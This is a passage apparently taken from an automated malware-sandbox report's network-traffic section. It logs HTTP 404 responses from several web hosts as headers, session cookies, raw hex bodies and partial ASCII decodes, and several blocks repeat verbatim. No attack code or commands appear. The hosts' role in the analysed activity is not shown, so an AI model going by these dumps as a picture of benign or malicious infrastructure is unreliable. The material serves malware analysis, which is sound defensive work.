da b5 d9 2b 48 6f b4 43 4a 4e dc c4 69 ba cc 80 2d 91 3c e7 f0 e3 e1 c7 ef d0 61 cc 27 a0 cd 4c b0 be 97 d3 38 e6 72 44 8c ca b7 60 7d 25 df f3 06 dd 6e 18 a0 05 3e bb e1 a5 9b 9f de b8 f3 d5 67 3b 90 9a 4c 0c ba a1 7d 80 a0 72 d4 f7 98 44 d3 30 65 34 1e 74 01 3f 61 c6 0c 45 3b 93 13 76 bf e4 93 be 77 43 49 c3 a4 21 77 66 39 f3 20 6a 5a 7d cf b0 3d 13 d8 40 db 10 a5 b4 d0 cc f4 4b 93 90 0d 0f 82 41 b7 13 1a 6e 04 1b 7c c8 cc 0d 55 e2 20 10 d8 29 0a 55 c0 4d 96 d0 52 98 30 68 0c d0 d2 4d 28 69 86 cb 98 70 36 cd 55 61 16 a6 99 f2 d8 a4 fd 98 4d 78 c4 88 6b 5c 01 2e b9 e1 54 10 1d 51 5c fc aa bf 62 57 db 09 2f 11 02 b7 15 b5 89 80 eb 4a 19 6d 0a 9a 03 21 16 8e e0 72 0c 69 c1 92 be 17 e4 e5 50 f0 28 48 04 35 a4 e4 c1 70 6e 1a 44 5a 1f b7 7c 6c 79 50 30 d1 f7 5c 92 75 ca 98 39 3d d1 07 18 05 be bc 75 fe 34 36 78 3b e5 59 a1 df 08 d3 fa e7 85 da e3 19 b5 fe 27 57 b1 30 4c 34 4d d8 59 73 2c cf 45 9c c5 6e f5 54 62 78 c3 95 d4 67 f9 2f c5 38 77 e7 c8 0e 92 20 43 ce f2 6e 77 e9 a3 3b 9f dc be 0a 3a e5 d9 15 48 90 14 b7 76 ae 91 0d d0 65 6e 37 1f 54 02 8d 01 13 2c 43 e6 69 1f de 17 02 94 49 59 01 1f 7f 01 98 70 7c 05 26 63 6b 9a 70 c1 fc 36 fd c8 80 bb 3c 01 61 30 22 6c de b3 1b af a3 82 e7 06 74 11 9d de f9 5d ed 08 7c 15 81 4c fc 5d ed 0d c2 a0 31 7f 0b c7 82 e9 5c c9 d8 cf b8 3c e5 7a e9 2e 62 e3 c9 3d 4b bd 79 be 4f 12 09 0c 1e a7 f6 14 e1 de 79 27 c8 69 b7 d3 b2 a5 e4 5f 0b 3a 53 65 93 d1 b7 c0 b5 7b bf 64 c5 8c ac fa 1b 7e 6f 09 38 14 85 e6 ac 87 43 15 cf ac 38 a0 3c 58 21 89 04 d5 da 0a c9 88 91 8c 72 49 ec 78 43 f7 85 61 7b fa 71 90 15 38 d2 e9 2c 3a 5a 39 20 Data Ascii: 54eWn6TRE~dkm:l(Z,X[lvA:4+HoCJNi-<a'L8rD`}%n>g;L}rD0e4t?aE;vwCI!wf9 jZ}=@KAn|U )UMR0hM(ip6UaMxk\.TQ\bW/Jm!riP(H5pnDZ|lyP0\u9=u46x;Y'W0L4MYs,EnTbxg/8w Cnw;:Hven7T,CiIYp|&ckp6<a0"lt]|L]1\<z.b=KyOy'i
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Jun 2024 20:39:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID5=1dc14ae36478ab420e0742cd783d1fc2; expires=Sat, 20-Jul-2024 20:39:23 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: dd_bdfhyr=97fbb4a1cb202a920db1824b75ad049b; expires=Thu, 20-Jun-2024 20:39:23 GMT; Max-Age=86400; path=/; secure; HttpOnlyServer-version: 38Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 dd 6e db 36 14 be b6 9f e2 54 bb e8 06 94 52 12 a7 45 7e 64 03 6b 9b 6d 1d 3a 6c d8 ba 8b a1 28 06 5a a2 2c c6 14 a9 8a 94 1d 0f bb 58 5b 6c d8 86 01 03 76 bf 8b be 41 3a 34 dd da b5 d9 2b 48 6f b4 43 4a 4e dc c4 69 ba cc 80 2d 91 3c e7 f0 e3 e1 c7 ef d0 61 cc 27 a0 cd 4c b0 be 97 d3 38 e6 72 44 8c ca b7 60 7d 25 df f3 06 dd 6e 18 a0 05 3e bb e1 a5 9b 9f de b8 f3 d5 67 3b 90 9a 4c 0c ba a1 7d 80 a0 72 d4 f7 98 44 d3 30 65 34 1e 74 01 3f 61 c6 0c 45 3b 93 13 76 bf e4 93 be 77 43 49 c3 a4 21 77 66 39 f3 20 6a 5a 7d cf b0 3d 13 d8 40 db 10 a5 b4 d0 cc f4 4b 93 90 0d 0f 82 41 b7 13 1a 6e 04 1b 7c c8 cc 0d 55 e2 20 10 d8 29 0a 55 c0 4d 96 d0 52 98 30 68 0c d0 d2 4d 28 69 86 cb 98 70 36 cd 55 61 16 a6 99 f2 d8 a4 fd 98 4d 78 c4 88 6b 5c 01 2e b9 e1 54 10 1d 51 5c fc aa bf 62 57 db 09 2f 11 02 b7 15 b5 89 80 eb 4a 19 6d 0a 9a 03 21 16 8e e0 72 0c 69 c1 92 be 17 e4 e5 50 f0 28 48 04 35 a4 e4 c1 70 6e 1a 44 5a 1f b7 7c 6c 79 50 30 d1 f7 5c 92 75 ca 98 39 3d d1 07 18 05 be bc 75 fe 34 36 78 3b e5 59 a1 df 08 d3 fa e7 85 da e3 19 b5 fe 27 57 b1 30 4c 34 4d d8 59 73 2c cf 45 9c c5 6e f5 54 62 78 c3 95 d4 67 f9 2f c5 38 77 e7 c8 0e 92 20 43 ce f2 6e 77 e9 a3 3b 9f dc be 0a 3a e5 d9 15 48 90 14 b7 76 ae 91 0d d0 65 6e 37 1f 54 02 8d 01 13 2c 43 e6 69 1f de 17 02 94 49 59 01 1f 7f 01 98 70 7c 05 26 63 6b 9a 70 c1 fc 36 fd c8 80 bb 3c 01 61 30 22 6c de b3 1b af a3 82 e7 06 74 11 9d de f9 5d ed 08 7c 15 81 4c fc 5d ed 0d c2 a0 31 7f 0b c7 82 e9 5c c9 d8 cf b8 3c e5 7a e9 2e 62 e3 c9 3d 4b bd 79 be 4f 12 09 0c 1e a7 f6 14 e1 de 79 27 c8 69 b7 d3 b2 a5 e4 5f 0b 3a 53 65 93 d1 b7 c0 b5 7b bf 64 c5 8c ac fa 1b 7e 6f 09 38 14 85 e6 ac 87 43 15 cf ac 38 a0 3c 58 21 89 04 d5 da 0a c9 88 91 8c 72 49 ec 78 43 f7 85 61 7b fa 71 90 15 38 d2 e9 2c 3a 5a 39 20 Data Ascii: 54eWn6TRE~dkm:l(Z,X[lvA:4+HoCJNi-<a'L8rD`}%n>g;L}rD0e4t?aE;vwCI!wf9 jZ}=@KAn|U )UMR0hM(ip6UaMxk\.TQ\bW/Jm!riP(H5pnDZ|lyP0\u9=u46x;Y'W0L4MYs,EnTbxg/8w Cnw;:Hven7T,CiIYp|&ckp6<a0"lt]|L]1\<z.b=KyOy'i
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-litespeed-tag: afb_HTTP.404content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache; privatex-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Wed, 19 Jun 2024 20:39:32 GMTserver: LiteSpeedData Raw: 63 33 34 0d 0a 80 90 02 80 f8 9f aa f6 df 73 c6 45 7f 56 0e 94 f6 11 0c 92 9c 28 51 de 18 bc 29 7a 21 e2 4a 84 17 04 f0 00 50 e1 6b 34 f3 8b fe 17 45 f7 ef 5d eb 15 b2 42 d9 0a 9f 64 22 f6 ee 13 e2 64 92 a3 bd fd 44 d8 56 31 3d 5f a5 00 50 c8 1a d9 1a 5b a1 fa 18 d3 fb da 49 39 8a 08 d4 ca 66 62 04 5c 64 76 10 1d 44 d3 26 b4 6a 00 ab 37 aa 7a a4 d9 a7 0f bd d9 41 04 00 7b 88 e3 df ec ba c1 2d 85 83 e6 2f f5 14 aa de 96 e0 e9 34 35 34 6f a9 ea 89 90 5f 8f 48 d8 b6 7a 40 45 50 a7 04 9b 7f 6f cc 7c cd 15 55 45 8f 28 37 26 b0 41 fb da 1f 1e bf 05 63 b3 76 7c d8 87 67 f7 9f dd 7f 82 d1 a3 1d 9a 29 98 0d 58 fc 7d 1e 1a 5d 3b 0a 84 d1 23 5c 3b a9 83 d4 4b 3c e9 94 da e2 b9 0e b4 74 3c 90 c0 7b 33 37 41 d6 f8 b0 f5 81 5a df cb 66 07 23 52 4d 34 4b a0 c9 59 18 07 85 71 de 04 4b 63 96 8a ac ea 3c 89 2c 9d 5a c3 ec 1b d3 22 c9 e7 f0 35 99 fe 2c 16 34 68 06 77 4e 81 ff 26 35 21 58 5f 66 99 6f 78 c3 17 23 91 d6 a6 25 d0 26 b4 3c b8 59 4c 6f 7a c8 62 a2 5c 49 74 d9 d9 da 32 a0 d7 cd 3a ab 0c 17 3e 1b e6 c3 51 96 5f a4 2d 66 23 c1 ea 32 88 66 f6 03 1f c9 a2 2b 93 df 73 dd 61 0c 61 2d 43 20 57 53 b8 42 b8 34 8a 14 8b cb 9a 3b c1 fe a1 be 6b 5b ee b6 37 07 39 e9 ba a1 d8 49 96 dd e3 ca 24 72 fd 81 df 04 65 de fb 26 98 fa 1b 2a 68 79 25 f5 5f 68 27 7a 61 8d 11 56 d0 d9 93 eb d6 b2 7b d6 60 53 e6 8d d1 4c 45 42 4f 22 07 36 3b 49 98 b5 ee d0 8f 73 b5 aa c6 69 91 16 f9 ed 6f 03 b2 ee e8 ff e6 4a f5 66 54 e6 d4 de 67 bb 20 b9 48 a0 b4 95 3a ad bd c7 8c 10 dd 95 2f b3 ac 16 fa d6 a7 b5 32 9d 58 28 ee a8 16 82 f0 cd b6 28 07 6f 71 0d be 26 6f 5a ca 4e d3 62 9c e6 08 62 95 02 ae e1 c5 00 5d 95 85 d1 c1 a7 3a 2c 93 5b e9 2b 3c b7 f6 fe 6a 07 26 bf ae ba 3f 27 55 8e f3 fc f8 fc e1 6b be 22 fd cf b5 33 e5 38 cf 93 f3 3c 4f c6 79 7e a7 15 9c dd 77 73 4f a1 52 3c 48 9d 9c 7b 1b 8c 36 21 59 49 0a 9a b7 e4 89 a4 d8 59 a4 dd b1 9e 67 34 e3 8e e4 55 01 60 6e c4 36 91 da 76 21 19 b4 ef 45 12 04 da 04 ee 88 0f d7 78 49 30 1a bb 0e cd 8a a9 3d 04 d7 ce c4 09 62 b3 27 24 36 7f ac c5 a4 9b c9 1e 19 c3 43 40 3b 81 a6 09 e2 27 46 07 dc 2f fa 63 e2 14 4f 1c 51 0c 47 43 7e 00 2c 82 61 cf ed 26 d7 9b 6b 8a a4 19 26 cd 28 69 c6 49 73 9a 34 67 fc 4c 7b 7f 4e 8a 15 0a f1 e8 39 76 cc 95 a6 75 6b 59 ef cf 79 75 fd 68 0e d4 a6 31 46 f8 85 5d 54 f0 8c e0 b0 b8 cc 2f f2 02 e2 59 ca 92 ad 69 fe 57 06 56 86 17 64 56 f1 9a 1a a3 04 39 d2 de 4f 34 5e f5 91 27 c8 8f 13 5c e6 c7 03 b0 13 df 9a ff 40 fb 07 b0 d6 d3 c6 09 29 95 b5 d1 e5 ce 87 6c 13 ce 95 aa 39 ad d4 72 a9 7a bf 92 64 fb 24 d0 26 f4 7e d1 30 62 76 17 38 34 40 bb c1 6e 9c 00 fe e5 4d 44 35 25 35 0c ee 66 45 2f Data Ascii: c34sEV(Q)z!
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-litespeed-tag: afb_HTTP.404content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache; privatex-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Wed, 19 Jun 2024 20:39:34 GMTserver: LiteSpeedData Raw: 63 33 34 0d 0a 80 90 02 80 f8 9f aa f6 df 73 c6 45 7f 56 0e 94 f6 11 0c 92 9c 28 51 de 18 bc 29 7a 21 e2 4a 84 17 04 f0 00 50 e1 6b 34 f3 8b fe 17 45 f7 ef 5d eb 15 b2 42 d9 0a 9f 64 22 f6 ee 13 e2 64 92 a3 bd fd 44 d8 56 31 3d 5f a5 00 50 c8 1a d9 1a 5b a1 fa 18 d3 fb da 49 39 8a 08 d4 ca 66 62 04 5c 64 76 10 1d 44 d3 26 b4 6a 00 ab 37 aa 7a a4 d9 a7 0f bd d9 41 04 00 7b 88 e3 df ec ba c1 2d 85 83 e6 2f f5 14 aa de 96 e0 e9 34 35 34 6f a9 ea 89 90 5f 8f 48 d8 b6 7a 40 45 50 a7 04 9b 7f 6f cc 7c cd 15 55 45 8f 28 37 26 b0 41 fb da 1f 1e bf 05 63 b3 76 7c d8 87 67 f7 9f dd 7f 82 d1 a3 1d 9a 29 98 0d 58 fc 7d 1e 1a 5d 3b 0a 84 d1 23 5c 3b a9 83 d4 4b 3c e9 94 da e2 b9 0e b4 74 3c 90 c0 7b 33 37 41 d6 f8 b0 f5 81 5a df cb 66 07 23 52 4d 34 4b a0 c9 59 18 07 85 71 de 04 4b 63 96 8a ac ea 3c 89 2c 9d 5a c3 ec 1b d3 22 c9 e7 f0 35 99 fe 2c 16 34 68 06 77 4e 81 ff 26 35 21 58 5f 66 99 6f 78 c3 17 23 91 d6 a6 25 d0 26 b4 3c b8 59 4c 6f 7a c8 62 a2 5c 49 74 d9 d9 da 32 a0 d7 cd 3a ab 0c 17 3e 1b e6 c3 51 96 5f a4 2d 66 23 c1 ea 32 88 66 f6 03 1f c9 a2 2b 93 df 73 dd 61 0c 61 2d 43 20 57 53 b8 42 b8 34 8a 14 8b cb 9a 3b c1 fe a1 be 6b 5b ee b6 37 07 39 e9 ba a1 d8 49 96 dd e3 ca 24 72 fd 81 df 04 65 de fb 26 98 fa 1b 2a 68 79 25 f5 5f 68 27 7a 61 8d 11 56 d0 d9 93 eb d6 b2 7b d6 60 53 e6 8d d1 4c 45 42 4f 22 07 36 3b 49 98 b5 ee d0 8f 73 b5 aa c6 69 91 16 f9 ed 6f 03 b2 ee e8 ff e6 4a f5 66 54 e6 d4 de 67 bb 20 b9 48 a0 b4 95 3a ad bd c7 8c 10 dd 95 2f b3 ac 16 fa d6 a7 b5 32 9d 58 28 ee a8 16 82 f0 cd b6 28 07 6f 71 0d be 26 6f 5a ca 4e d3 62 9c e6 08 62 95 02 ae e1 c5 00 5d 95 85 d1 c1 a7 3a 2c 93 5b e9 2b 3c b7 f6 fe 6a 07 26 bf ae ba 3f 27 55 8e f3 fc f8 fc e1 6b be 22 fd cf b5 33 e5 38 cf 93 f3 3c 4f c6 79 7e a7 15 9c dd 77 73 4f a1 52 3c 48 9d 9c 7b 1b 8c 36 21 59 49 0a 9a b7 e4 89 a4 d8 59 a4 dd b1 9e 67 34 e3 8e e4 55 01 60 6e c4 36 91 da 76 21 19 b4 ef 45 12 04 da 04 ee 88 0f d7 78 49 30 1a bb 0e cd 8a a9 3d 04 d7 ce c4 09 62 b3 27 24 36 7f ac c5 a4 9b c9 1e 19 c3 43 40 3b 81 a6 09 e2 27 46 07 dc 2f fa 63 e2 14 4f 1c 51 0c 47 43 7e 00 2c 82 61 cf ed 26 d7 9b 6b 8a a4 19 26 cd 28 69 c6 49 73 9a 34 67 fc 4c 7b 7f 4e 8a 15 0a f1 e8 39 76 cc 95 a6 75 6b 59 ef cf 79 75 fd 68 0e d4 a6 31 46 f8 85 5d 54 f0 8c e0 b0 b8 cc 2f f2 02 e2 59 ca 92 ad 69 fe 57 06 56 86 17 64 56 f1 9a 1a a3 04 39 d2 de 4f 34 5e f5 91 27 c8 8f 13 5c e6 c7 03 b0 13 df 9a ff 40 fb 07 b0 d6 d3 c6 09 29 95 b5 d1 e5 ce 87 6c 13 ce 95 aa 39 ad d4 72 a9 7a bf 92 64 fb 24 d0 26 f4 7e d1 30 62 76 17 38 34 40 bb c1 6e 9c 00 fe e5 4d 44 35 25 35 0c ee 66 45 2f Data Ascii: c34sEV(Q)z!
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-litespeed-tag: afb_HTTP.404content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache; privatex-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Wed, 19 Jun 2024 20:39:37 GMTserver: LiteSpeedData Raw: 63 33 33 0d 0a 80 90 02 80 f8 9f aa f6 df 73 c6 45 7f 56 0e 94 f6 11 0c 92 9c 28 51 de 18 bc 29 7a 21 e2 4a 84 17 04 f0 00 50 e1 6b 34 f3 8b fe 17 45 f7 ef 5d eb 15 b2 42 d9 0a 9f 64 22 f6 ee 13 e2 64 92 a3 bd fd 44 d8 56 31 3d 5f a5 00 50 c8 1a d9 1a 5b a1 fa 18 d3 fb da 49 39 8a 08 d4 ca 66 62 04 5c 64 76 10 1d 44 d3 26 b4 6a 00 ab 37 aa 7a a4 d9 a7 0f bd d9 41 04 00 7b 88 e3 df ec ba c1 2d 85 83 e6 2f f5 14 aa de 96 e0 e9 34 35 34 6f a9 ea 89 90 5f 8f 48 d8 b6 7a 40 45 50 a7 04 9b 7f 6f cc 7c cd 15 55 45 8f 28 37 26 b0 41 fb da 1f 1e bf 05 63 b3 76 7c d8 87 67 f7 9f dd 7f 82 d1 a3 1d 9a 29 98 0d 58 fc 7d 1e 1a 5d 3b 0a 84 d1 23 5c 3b a9 83 d4 4b 3c e9 94 da e2 b9 0e b4 74 3c 90 c0 7b 33 37 41 d6 f8 b0 f5 81 5a df cb 66 07 23 52 4d 34 4b a0 c9 59 18 07 85 71 de 04 4b 63 96 8a ac ea 3c 89 2c 9d 5a c3 ec 1b d3 22 c9 e7 f0 35 99 fe 2c 16 34 68 06 77 4e 81 ff 26 35 21 58 5f 66 99 6f 78 c3 17 23 91 d6 a6 25 d0 26 b4 3c b8 59 4c 6f 7a c8 62 a2 5c 49 74 d9 d9 da 32 a0 d7 cd 3a ab 0c 17 3e 1b e6 c3 51 96 5f a4 2d 66 23 c1 ea 32 88 66 f6 03 1f c9 a2 2b 93 df 73 dd 61 0c 61 2d 43 20 57 53 b8 42 b8 34 8a 14 8b cb 9a 3b c1 fe a1 be 6b 5b ee b6 37 07 39 e9 ba a1 d8 49 96 dd e3 ca 24 72 fd 81 df 04 65 de fb 26 98 fa 1b 2a 68 79 25 f5 5f 68 27 7a 61 8d 11 56 d0 d9 93 eb d6 b2 7b d6 60 53 e6 8d d1 4c 45 42 4f 22 07 36 3b 49 98 b5 ee d0 8f 73 b5 aa c6 69 91 16 f9 ed 6f 03 b2 ee e8 ff e6 4a f5 66 54 e6 d4 de 67 bb 20 b9 48 a0 b4 95 3a ad bd c7 8c 10 dd 95 2f b3 ac 16 fa d6 a7 b5 32 9d 58 28 ee a8 16 82 f0 cd b6 28 07 6f 71 0d be 26 6f 5a ca 4e d3 62 9c e6 08 62 95 02 ae e1 c5 00 5d 95 85 d1 c1 a7 3a 2c 93 5b e9 2b 3c b7 f6 fe 6a 07 26 bf ae ba 3f 27 55 8e f3 fc f8 fc e1 6b be 22 fd cf b5 33 e5 38 cf 93 f3 3c 4f c6 79 7e a7 15 9c dd 77 73 4f a1 52 3c 48 9d 9c 7b 1b 8c 36 21 59 49 0a 9a b7 e4 89 a4 d8 59 a4 dd b1 9e 67 34 e3 8e e4 55 01 60 6e c4 36 91 da 76 21 19 b4 ef 45 12 04 da 04 ee 88 0f d7 78 49 30 1a bb 0e cd 8a a9 3d 04 d7 ce c4 09 62 b3 27 24 36 7f ac c5 a4 9b c9 1e 19 c3 43 40 3b 81 a6 09 e2 27 46 07 dc 2f fa 63 e2 14 4f 1c 51 0c 47 43 7e 00 2c 82 61 cf ed 26 d7 9b 6b 8a a4 19 26 cd 28 69 c6 49 73 9a 34 67 fc 4c 7b 7f 4e 8a 15 0a f1 e8 39 76 cc 95 a6 75 6b 59 ef cf 79 75 fd 68 0e d4 a6 31 46 f8 85 5d 54 f0 8c e0 b0 b8 cc 2f f2 02 e2 59 ca 92 ad 69 fe 57 06 56 86 17 64 56 f1 9a 1a a3 04 39 d2 de 4f 34 5e f5 91 27 c8 8f 13 5c e6 c7 03 b0 13 df 9a ff 40 fb 07 b0 d6 d3 c6 09 29 95 b5 d1 e5 ce 87 6c 13 ce 95 aa 39 ad d4 72 a9 7a bf 92 64 fb 24 d0 26 f4 7e d1 30 62 76 17 38 34 40 bb c1 6e 9c 00 fe e5 4d 44 35 25 35 0c ee 66 45 2f Data Ascii: c33sEV(Q)z!
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache; privatex-litespeed-cache-control: public,max-age=3600x-litespeed-tag: afb_HTTP.404,afb_404,afb_URL.bb612978f523fb6348e4e3107ed53975,afb_x-litespeed-cache: misstransfer-encoding: chunkeddate: Wed, 19 Jun 2024 20:39:39 GMTserver: LiteSpeedData Raw: 32 39 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 45 4f 20 2d 2d 3e 0d 0a 3c 74 69 74 6c 65 3e 53 48 41 48 41 46 20 33 44 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 6e 63 72 65 74 65 20 33 44 20 50 72 69 6e 74 69 6e 67 20 46 75 6c 6c 79 20 49 6e 74 65 67 72 61 74 65 64 20 52 6f 62 6f 74 69 63 20 53 79 73 74 65 6d 73 22 2f 3e 0d 0a 3c 21 2d 2d 20 6f 67 20 6d 65 74 61 20 66 6f 72 20 66 61 63 65 62 6f 6f 6b 2c 20 67 6f 6f 67 6c 65 70 6c 75 73 20 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 48 41 48 41 46 20 33 44 22 2f 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 6e 63 72 65 74 65 20 33 44 20 50 72 69 6e 74 69 6e 67 20 46 75 6c 6c 79 20 49 6e 74 65 67 72 61 74 65 64 20 52 6f 62 6f 74 69 63 20 53 79 73 74 65 6d 73 22 2f 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 73 68 61 68 61 66 33 64 2e 63 6f 6d 22 2f 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 73 68 61 68 61 66 33 64 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 38 2f 73 68 61 68 61 66 2d 33 64 2d 63 6f 6e 63 72 65 74 65 2d 70 72 69 6e 74 69 6e 67 2e 6a 70 67 22 2f 3e 0d 0a 0d 0a 3c 21 2d 2d 20 74 77 69 74 74 65 72 20 6d 65 74 61 20 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 2f 3e 0d 0a 3c 6d Data Ascii: 29a7<!DOCTYPE html><html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" cont
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Jun 2024 20:40:08 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
